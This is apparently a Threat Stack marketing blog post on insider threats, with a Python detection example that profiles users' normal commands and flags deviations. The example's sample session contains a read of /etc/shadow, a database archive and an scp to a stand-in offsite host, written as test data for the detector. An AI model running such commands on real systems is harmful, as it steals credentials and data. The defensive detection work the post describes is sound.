Insider Threats: Your Biggest Risk

While many companies have become exceptional at protecting against external threats, how much attention goes to attacks that originate internally? Enterprises are focused on shoring up perimeter defenses against outside hackers, but according to a recent report by Forrester, internal breaches became the top source of breaches in 2013, with 36% of breaches originating from employees.

Faulty logic: External threats are more pervasive than internal

Insider threats are typically dismissed as a secondary risk to the security of a company, but this is counterintuitive. Enterprises are realizing that they lack system controls and have little to no insight into internal network activity. On top of that, given the dynamic capabilities of the cloud, users can quickly and easily spin up new machines on AWS, for example, without explicit consent or security protocols to follow. Consequently, enterprises are becoming more and more aware that internal users who hold the right permissions can access sensitive data and cause destruction from within.


Mitigation of these (very real) risks involves actively managing and monitoring user access levels and activity to lessen, and hopefully prevent, any potential damage. Combine the growing complexity of networks with the abundance of new applications and security products, and it is becoming harder for IT teams to manage their security tooling, but it does not need to be complicated.

Internal defenses: Detection and auditing

Enterprises must know who is doing what on their cloud servers, and when, in order to reduce and stop internal threats. This requires clear visibility into systems and networks so that user behavior can be detected and audited.

What they need is the ability to audit what a user does once they connect to a network: a full record of the commands the user executes during the session, and a profile of that user's normal behavior, so that abnormal activity can be detected easily and an attack stopped quickly. If an employee's normal behavior starts to change, that deviation is a signal that they could be attempting an attack. Spotting these behaviors consistently and early goes a long way toward anticipating when an internal threat will occur.

Intrusion detection from within

Enterprises must be strategic at a high level when it comes to security — for both external and internal protection. Ideally, a multi-layered approach should be implemented. Since your users are already inside your network, you need to create deep security layers to prevent them from executing malicious commands when logged in. Always start with the understanding that an attacker is already on the inside, and work backwards from there.

If your organization does not already have controls in place to restrict privileged access from within, you should implement a strong detection and auditing system that logs, monitors, records, and alerts you on all session activity. An effective detection and auditing system will manage, monitor, and secure your cloud infrastructure against internal (and external) attackers. You will also benefit from the control and accountability that is critical for meeting compliance regulations and passing audits.
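The two ideas above, a full record of the commands a user runs per session and a profile of that user's normal behavior against which new sessions are scored, can be illustrated with a small baseline-and-deviation check. The following is an added example written for this page, not Threat Stack's code and not how Cloud Sight is implemented. It assumes a simplified audit log format of `<timestamp> <user> <command line>` per line, and both the baseline log and the session being scored are constructed sample data. The profile records, per user, which programs they have run, the hours at which they are active, and whether they have ever used sudo; any command in a new session that is a first for that user, falls outside their usual hours, or is their first privileged invocation is flagged, and a helper returns the commands before and after an alert so an analyst sees the surrounding session, not just the one line.

```python
"""Command-audit baseline and deviation check (constructed example).

Builds a per-user profile of normal behaviour from an audit log of executed
commands, then flags commands in a new session that deviate from it.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed audit log: "<timestamp> <user> <command line>". Not real data.
BASELINE_LOG = """\
2013-06-01T09:02:11 alice git pull
2013-06-01T09:05:40 alice make test
2013-06-01T09:30:02 alice git push
2013-06-02T09:01:55 alice git pull
2013-06-02T10:12:13 alice make test
2013-06-01T14:00:00 bob sudo apt-get install nginx
2013-06-01T14:05:10 bob sudo service nginx restart
2013-06-02T15:20:43 bob tail -n 50 /var/log/nginx/error.log
"""

# Constructed session to score: a developer account active at 2 a.m. doing
# things it has never done before.
NEW_SESSION = """\
2013-06-03T02:14:02 alice git pull
2013-06-03T02:16:30 alice sudo cat /etc/shadow
2013-06-03T02:17:01 alice tar czf /tmp/db.tgz /var/lib/postgresql
2013-06-03T02:18:45 alice scp /tmp/db.tgz offsite.example.net:/tmp
"""


@dataclass(frozen=True)
class Event:
    ts: str          # ISO-8601 timestamp as logged
    user: str
    argv: tuple      # command line split on whitespace


def parse_log(text):
    """Parse log lines into Events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, user, *argv = parts
        events.append(Event(ts, user, tuple(argv)))
    return events


def program(argv):
    """Program name with a leading 'sudo' stripped, so 'sudo cat' profiles as 'cat'."""
    tokens = argv[1:] if argv and argv[0] == "sudo" else argv
    return tokens[0] if tokens else ""


def hour_of(ts):
    """Hour of day from the timestamp (characters 11-12 of 'YYYY-MM-DDTHH:MM:SS')."""
    return int(ts[11:13])


def build_profile(events):
    """Per-user baseline: programs used, hours of activity, whether sudo was ever used."""
    profile = defaultdict(lambda: {"programs": Counter(), "hours": set(), "sudo": False})
    for e in events:
        p = profile[e.user]
        p["programs"][program(e.argv)] += 1
        p["hours"].add(hour_of(e.ts))
        if e.argv[0] == "sudo":
            p["sudo"] = True
    return dict(profile)


def score_session(profile, events):
    """Return (ts, user, command, reasons) for every event that deviates from the baseline."""
    alerts = []
    for e in events:
        reasons = []
        p = profile.get(e.user)
        if p is None:
            reasons.append("no baseline for user")
        else:
            prog = program(e.argv)
            if prog not in p["programs"]:
                reasons.append(f"first use of '{prog}'")
            if hour_of(e.ts) not in p["hours"]:
                reasons.append("outside usual hours")
            if e.argv[0] == "sudo" and not p["sudo"]:
                reasons.append("first sudo use")
        if reasons:
            alerts.append((e.ts, e.user, " ".join(e.argv), reasons))
    return alerts


def context(events, index, before=1, after=1):
    """Commands surrounding an event, for the before/during/after view of a session."""
    lo, hi = max(0, index - before), min(len(events), index + after + 1)
    return [" ".join(e.argv) for e in events[lo:hi]]


if __name__ == "__main__":
    baseline = build_profile(parse_log(BASELINE_LOG))
    session = parse_log(NEW_SESSION)
    for ts, user, cmd, reasons in score_session(baseline, session):
        print(f"{ts} {user}: {cmd}  <- {', '.join(reasons)}")
```

Scored against its own baseline the log produces no alerts, which is the sanity check to run before trusting any such profile. Three caveats matter in practice: the baseline window has to be long enough that ordinary variation (a release week, an on-call rotation) is already inside it, the "first use" rule is noisy for new hires and changing roles and needs a learning period per account, and a session's commands should be read together through something like `context()` rather than judged one line at a time, since a single `tar` is routine and `tar` followed by a copy off-host is not.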

At Threat Stack, for example, we’ve spared no effort to ensure that our cloud security monitoring solution solves internal vulnerabilities and attacks. Our Cloud Sight product is equally adept at watching for internal anomalies as it is for external activities. Our logs dive deep into every command a user has run to give you a full understanding of what they did before, during, and after a malicious command was executed.

We’ve found that this is far more effective not only at recognizing abnormal activity and stopping it, but also at helping organizations understand how attacks happen so they can take measures to prevent them in the future.

The scope of security monitoring is changing, especially with the exponential growth of cloud and social applications, and enterprises need to be prepared for an entirely new realm of vulnerabilities and attacks — ones that can easily be identified and stopped with the right continuous security monitoring systems in place.

Interested in how Cloud Sight by Threat Stack can help you monitor internal and external activity at the deepest level?

Join our beta today and begin truly protecting your cloud infrastructure.